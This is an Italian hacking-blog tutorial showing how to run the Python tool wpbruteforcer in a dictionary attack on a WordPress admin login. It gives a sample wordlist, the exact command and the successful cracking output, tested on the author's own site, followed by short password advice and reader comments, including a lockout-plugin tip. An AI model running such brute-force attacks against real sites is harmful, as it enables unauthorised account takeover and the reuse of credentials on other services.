Ricevi gli aggiornamenti nella tua email:




ago
15th

Attaccare WordPress con wpbruteforcer

Author: Angelo Righi | Hacking

Quale momento migliore per sferrare un attacco mentre tutti sono in vacanza? E’ quello che probabilmente ha pensato Kevin Mitnick quando pianificò il suo leggendario attacco di Natale.

Volando molto più basso del Condor, addirittura sottoterra, nell’underground della rete, ho trovato uno script che effettua un attacco dictionary attack contro i blog basati su WordPress.

Lo script di cui parlo è wpbruteforcer, uno programma scritto in python. Per funzionare necessita del modulo mechanize. L’ho testato su di un paio di piattaforme, e benchè mi dia un errore alla fine dell’attacco, compie il suo dovere.

Cosa fa? Semplice, prende un dizionario di parole e le prova come  fossero le password di un utente specificato, nella speranza di trovare quella giusta.  Questa è la prova su strada che ho effettuato su Ubuntu.

Per prima cosa mi sono creato al volo con pico un dizionario formato da 7 parole, naturalmente un attacco vero dovrà utilizzare un dizionario più corposo:

angelor@xronin:~/Scaricati$ cat wordlist
pippo
pluto
paperino
batman
topolino
god
zeus

Quindi ho lanciato l’attacco contro PillolHacking.Net, specificando il target con l’opzione -t, l’utente (admin) con -u e il dizionario da utilizzare con -w:

angelor@xronin:~/Scaricati$ ./wpbruteforcer.py -t www.pillolhacking.net  -u admin -w wordlist
 
[*] Starting attack at 16:25:04
[*] Target site : http://www.pillolhacking.net/wp-login.php
[*] Account for bruteforcing "admin"
[*] Loaded : 7 words
[*] Bruteforcing wp-login, please wait...
[*] Trying ...

Al quinto tentativo l’attacco ha avuto successo:

[*] Logging in success...
[*] Username : admin
[*] Password : topolino

Ovviamente in uno scenario reale le cose non sono così semplici e immediate.

Questo attacco è insidioso, perchè spesso gli utenti utiizzano una sola password per diversi servizi: con la password recuperata in modo tutto sommato semplice potrebbe essere possibile attaccare altri servizi più interessanti.

Tuttavia, difendersi da questo attacco è semplice, basta evitare l’utilizzo di parole banali: semplicemente ritoccando una parola comune, aggiungendo caratteri speciali e/o numeri all’inizio o alla fine, rende l’attacco vano. Ma spesso questo accorgimento non viene messo in pratica, con i risultati che è facile immaginare.


Altri articoli:

Craccare Facebook con fbruteforcer
Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di...

Risorse per la Sicurezza di WordPress
WordPress è una applicazione web, e come tutte le applicazioni web è soggetta a pericoli. Questi...

PillolHacking.Net: I Migliori Articoli del 2010
Quello che si conclude è l’anno di Wikileaks e di Stuxnet, del controverso Assange e dell’esplosione...

Qual’è il Modo Migliore per Navigare Anonimi?
Qual’è il modo migliore per proteggere la propria privacy durante la navigazione Internet? La stessa...



Se vuoi essere sicuro di ricevere tutti gli aggiornamenti di PillolHacking gratuitamente nella tua email, iscriviti inserendo il tuo indirizzo qui sotto:


8 responses. Wanna say something?

  1. clshack
    ago 17, 2010 at 11:35:09
    #1

    Di programmi come questo ne esistono a miglioni :D

    Ne avevo scritto uno anche io ;)

    http://www.clshack.it/python-wordpress-brute-force-script

    Funziona sui wordpress it e en e controlla se l’username è giusto, per evitare di brutare su un username sbagliato ;)

    Ciao

  2. Angelo Righi
    ago 21, 2010 at 00:51:57
    #2

    lo provero ;)

  3. Polka
    mar 6, 2011 at 17:51:33
    #3

    Scusa, è da tutto il pomeriggio che ci sto provando ma non ne esco fuori.Potresti darmi una mano ?

  4. giuseppe
    apr 27, 2011 at 04:50:17
    #4

    salve a tutti..non sono molto ferrato in materia,quindi molto umilmente chiedo:come faccio a far funzionare questi script? non mi importa nulla di password di facebook ecc,ma ho semplicemente voglia di imparare “il linguaggio” grazie a chinque mi risponda.comunque ottimo sito,complimenti

  5. Carrone
    ago 10, 2011 at 19:46:15
    #5

    Oltre a mettere una password buona (Ma sempre con il rischio che prima o poi possa essere scoperta), esiste un plugin per wordpress, che, dopo cinque volte che si tenti di effettuare il login, questo non va a buon fine, si deve aspettare ben 20 minuti, ritardando di gran lunga l’attacco. Comunque sia una buona password, non fa mai male.

3 Trackback(s)

  1. ago 15, 2010: Tweets that mention Attaccare WordPress con wpbruteforcer | PillolHacking.Net -- Topsy.com
  2. ago 17, 2010: Technotizie.it
  3. gen 1, 2011: PillolHacking.Net: I Migliori Articoli del 2010 | PillolHacking.Net

Post a Comment